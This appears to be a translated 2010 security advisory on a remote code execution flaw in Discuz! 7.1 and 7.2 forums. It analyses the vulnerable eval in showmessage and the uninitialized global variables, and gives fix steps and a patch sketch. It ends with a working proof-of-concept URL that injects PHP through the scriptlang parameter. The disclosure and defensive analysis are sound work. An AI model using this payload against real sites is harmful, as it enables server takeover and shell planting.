Discuz! 7.1 & 7.2 remote code execution vulnerability - vulnerability warning - the black bar safety net

2010-01-08T00:00:00
ID MYHACK58:62201025856
Type myhack58
Reporter Anonymous
Modified 2010-01-08T00:00:00

Description

First, about how it got out: the vulnerability spread from the t00ls core group. xhming went and read the code, then I read it later, and both of us read out the code execution. On the night of January 5 at 11 o'clock, in the core hacker group, xhming gave a PoC and I gave an exp; we had found the same problem. After 2 a.m. I went offline, and at that point only a few people in the t00ls core group knew I had given out the exp. I could never have imagined that half a day later the exp would be flying around, and it was indeed the version I had posted the day before.

It is not hard to imagine how fast the exp travels: A and B are on good terms, so A gives it to B; B and C are friends, so B gives it to C... there are always people who cannot hold their temper and let word slip, so they hand over a copy. Most unbearable of all, some SB in the group even brought it out to sell; I really don't want to say anything more: when it comes to peddling, is it your turn? People's hearts are not what they used to be; from now on I will keep things to myself.

This morning the vulnerability was reported to Saiy; the official DZ patch will be out soon.

Special note: the $scriptlang array that causes the vulnerability is initialized once a plug-in has been installed, so users who have plug-ins installed are not affected.

Vulnerability description:

In the new Discuz! versions 7.1 and 7.2, a parameter that the showmessage function passes to eval is not initialized and can be submitted arbitrarily, which allows execution of arbitrary PHP code.

Vulnerability analysis:

The following is an analysis of the remote code execution vulnerability. The problem is really serious: it can write a shell directly.

First, the vulnerability comes from the showmessage function:

```php
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
	extract($GLOBALS, EXTR_SKIP); // dangerous: uninitialized variables are pulled straight into the function scope, which directly causes the problem (from www.oldjun.com)
	global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
	define('CACHE_FORBIDDEN', TRUE);

	$hookscriptmessage = $show_message = $message;
	$messagehandle = 0;
	$msgforward = unserialize($_DCACHE['settings']['msgforward']);
	$refreshtime = intval($msgforward['refreshtime']);
	$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
	$msgforward['refreshtime'] = $refreshtime * 1000;
	$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
	$seccodecheck = $seccodestatus & 2;

	if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
		$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
		if($fp = @fopen($statlogfile, 'a')) {
			@flock($fp, 2);
			if(is_array($funcstatinfo)) {
				$funcstatinfo = array_unique($funcstatinfo);
				foreach($funcstatinfo as $funcinfo) {
					fwrite($fp, funcstat_query($funcinfo, $message)."\n");
				}
			} else {
				fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
			}
			fclose($fp);
			$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
		}
	}

	if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
		write_statlog($message);
	}

	if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
		updatesession();
		dheader("location: ".str_replace('&amp;', '&', $url_forward));
	}

	if(!empty($infloat)) {
		if($extra) {
			$messagehandle = $extra;
		}
		$extra = '';
	}

	if(in_array($extra, array('HALTED', 'NOPERM'))) {
		$discuz_action = 254;
	} else {
		$discuz_action = 255;
	}

	include language('messages');

	$vars = explode(':', $message); // any message containing ':' reaches this branch
	if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) { // two parts separated by ':' are enough
		// $scriptlang is not initialized, so it can be supplied by the request (from www.oldjun.com)
		eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");
	} elseif(isset($language[$message])) {
		$pre = $inajax ? 'ajax_' : '';
		eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
		unset($pre);
	}

	......
}
```

Second, the DZ global-variable mechanism means that any uninitialized variable can be submitted by the client:

```php
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
	foreach($$_request as $_key => $_value) {
		// every request key not starting with '_' becomes a global variable of the same name
		$_key{0} != '_' && $$_key = daddslashes($_value);
	}
}
```

Third, misc.php only needs a custom message, and here too the variable is not initialized:

```php
elseif($action == 'imme_binding' && $discuz_uid) {
	if(isemail($id)) {
		$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
		$msn = explode("\t", $msn);
		$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
		$msn = "$msn[0]\t$id";
		$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
		showmessage('msn_binding_succeed', 'memcp.php');
	} else {
		if($result == 'Declined') {
			dheader("Location: memcp.php");
		} else {
			showmessage($response['result']); // $response is not initialized, so it can be supplied by the request (from www.oldjun.com)
		}
	}
}
```

Fourth, exploiting the vulnerability:

In showmessage, `$vars = explode(':', $message);` splits a message that the submitter controls, so it is very easy: the parameter is a custom two-level array.

Fifth, fixing the vulnerability:

  1. If a patch is available, apply it.
  2. If there is no patch, either comment out the statement that causes the vulnerability, or assign a value to the two variables before they are used.
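As an added example (not the advisory's or Discuz!'s own code), the PHP below sketches the second fix in a self-contained form: the request-import loop only copies an allow-list of names instead of every key, and the message lookup initializes `$scriptlang` locally and renders the template by placeholder substitution instead of `eval`. The function names, the allow-list and the `{name}` placeholder syntax are assumptions made for this illustration.

```php
<?php
// Added illustration, not Discuz! code. Function names, the allow-list and the
// {name} placeholder syntax are assumptions made for this example.

// Replacement for the register-globals-style import loop quoted in the advisory.
// The original copies every _COOKIE/_POST/_GET key not starting with '_' into a
// global of the same name, so a request key such as scriptlang[1][2] silently
// becomes $scriptlang[1][2]. Here only explicitly allowed names are imported,
// and they are returned as an array instead of being written into global scope.
function import_request_vars(array $sources, array $allowed) {
    $imported = array();
    foreach ($sources as $source) {
        foreach ($source as $key => $value) {
            if (in_array($key, $allowed, true)) {
                $imported[$key] = $value;
            }
        }
    }
    return $imported;
}

// Replacement for the eval() branch of showmessage(). $scriptlang is created
// empty inside the function (the "assign the variables a value" fix), filled
// only from the trusted plug-in language table the caller passes in, and the
// selected template is rendered by placeholder substitution rather than eval,
// so a template like {${...}} is printed literally instead of being executed.
function render_message($message, array $language, array $plugin_lang = array(), array $values = array()) {
    $scriptlang = array();
    foreach ($plugin_lang as $script => $entries) {
        if (is_array($entries)) {
            $scriptlang[$script] = $entries;
        }
    }

    $vars = explode(':', $message);
    if (count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {
        $template = $scriptlang[$vars[0]][$vars[1]];
    } elseif (isset($language[$message])) {
        $template = $language[$message];
    } else {
        // Unknown key: show it escaped, never interpret it.
        return htmlspecialchars($message, ENT_QUOTES, 'UTF-8');
    }

    // Substitute {name} placeholders from a fixed value array; nothing is eval'd.
    return preg_replace_callback('/\{(\w+)\}/', function ($m) use ($values) {
        return isset($values[$m[1]]) ? htmlspecialchars($values[$m[1]], ENT_QUOTES, 'UTF-8') : $m[0];
    }, $template);
}

// Constructed demo input that mimics the request shape described in the advisory.
$request = array(
    'action'     => 'imme_binding',
    'response'   => array('result' => '1:2'),
    'scriptlang' => array(1 => array(2 => '{${untrusted}}')),
);
$imported = import_request_vars(array($request), array('action', 'id'));
var_dump(isset($imported['scriptlang']));  // 'response' and 'scriptlang' are not on the allow-list

$language = array('msn_binding_succeed' => 'MSN binding succeeded for {user}');
echo render_message('msn_binding_succeed', $language, array(), array('user' => 'alice')), "\n";
echo render_message('1:2', $language), "\n";  // no plug-in table was supplied, so the literal key is shown escaped
```

The point of the second function is that the lookup key and the template are both taken from data the server loaded itself; even if an attacker could still influence `$message`, the worst outcome is an unknown key echoed back HTML-escaped.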

PoC:

At Saiy's request, no exp is released. Register a user, log in, then submit `misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}`